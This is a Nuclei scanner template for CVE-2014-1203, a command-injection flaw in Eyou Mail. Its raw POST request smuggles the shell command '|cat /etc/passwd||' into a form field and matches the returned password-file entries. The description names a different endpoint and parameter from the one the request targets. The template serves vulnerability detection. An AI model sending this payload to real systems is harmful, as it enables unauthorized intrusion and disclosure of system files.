nuclei-templates/cves/2014/CVE-2014-1203.yaml

40 lines
1.1 KiB
YAML

id: CVE-2014-1203
info:
name: Eyou E-Mail <3.6 - Remote Code Execution
author: pikpikcu
severity: critical
description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
- https://nvd.nist.gov/vuln/detail/CVE-2014-1203
- http://seclists.org/fulldisclosure/2014/Jan/32
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-1203
cwe-id: CWE-77
tags: seclists,rce,eyou
requests:
- raw:
- |
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type='|cat /etc/passwd||'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/01